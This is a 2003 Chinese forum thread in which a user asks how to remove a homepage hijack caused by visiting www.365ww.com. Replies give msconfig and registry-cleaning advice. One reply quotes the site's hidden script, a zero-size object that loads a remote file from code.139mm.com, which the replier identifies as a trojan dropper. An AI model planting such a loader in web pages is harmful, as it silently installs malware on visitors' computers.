www.365ww.com病毒求救

ccw1979 2003-10-20 05:21:38
请问一下,由于本人登陆了www.365ww.com这个网址,使得IE默认页始终为这个网址,不管怎么改变都不行,请问如何才能彻底消除这个病毒。
...全文
211 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
ccw1979 2003-10-22
  • 打赏
  • 举报
回复
对了,怎么结贴啊
ccw1979 2003-10-22
  • 打赏
  • 举报
回复
不好意思,上面的“可以”是“可疑”
ccw1979 2003-10-22
  • 打赏
  • 举报
回复
用超级兔子和MSCONFIG好像都不能彻底删除,重启机子后主页依然是www.365ww.com。我听取同事的意见后,首先清理注册表,然后在金山的反注册编辑器中将可以的启动程序删除,尤其注意的是里面有一个空白启动程序,一定要删除,然后重启应该可以了。
hxin 2003-10-21
  • 打赏
  • 举报
回复
先用进程查看,把可疑地进程杀掉。然后在注册表里把RUN里面和RUN*里面可疑地东西删掉。然后把可以进程地文件也删掉。最后再把主页改成正常地(重要) 然后就可以重启机器了。
boyifeng 2003-10-21
  • 打赏
  • 举报
回复
msconfig中可以设置不启动!
boyifeng 2003-10-21
  • 打赏
  • 举报
回复
超级兔子魔法设置!
奇伢 2003-10-21
  • 打赏
  • 举报
回复
http://www.network-cn.com/Announce/Announce.asp?BoardID=203&ID=131
ccw1979 2003-10-21
  • 打赏
  • 举报
回复
谢了。
我用的是2000的专业版。
我也试过用msconfig这个方法,好像重启后还是不行。
至于木马文件如何寻找,还请zhllwarez明示。
qantgh 2003-10-21
  • 打赏
  • 举报
回复
如果是2000的话,在XP下找个msconfig.exe,就行了。
qantgh 2003-10-20
  • 打赏
  • 举报
回复
如果你用的是98和xp吗
如果是,你在"开始"_运行中输入"msconfig",在启动中将不要的启动米格掉,这样一般就好了,如果不行,就要改config.sys等了,总之不顺眼的都米格掉就好了.

zhllwarez 2003-10-20
  • 打赏
  • 举报
回复
源代码中发现这么一处可疑代码:
<SCRIPT LANGUAGE="Javascript">document.write (' <object data="http://code.139mm.com:88/da112.test" width="0" height="0"> </object> ');</SCRIPT>
肯定又是利用mime错误解析运行的一个exe木马文件,应为code.139mm.com我暂时无法打开,故请自行处理下一步问题,一般是先找到那个木马文件删除,然后清理注册表即可。

6,185

社区成员

发帖
与我相关
我的任务
社区描述
windows网络管理与配置
社区管理员
  • 网络管理与配置社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧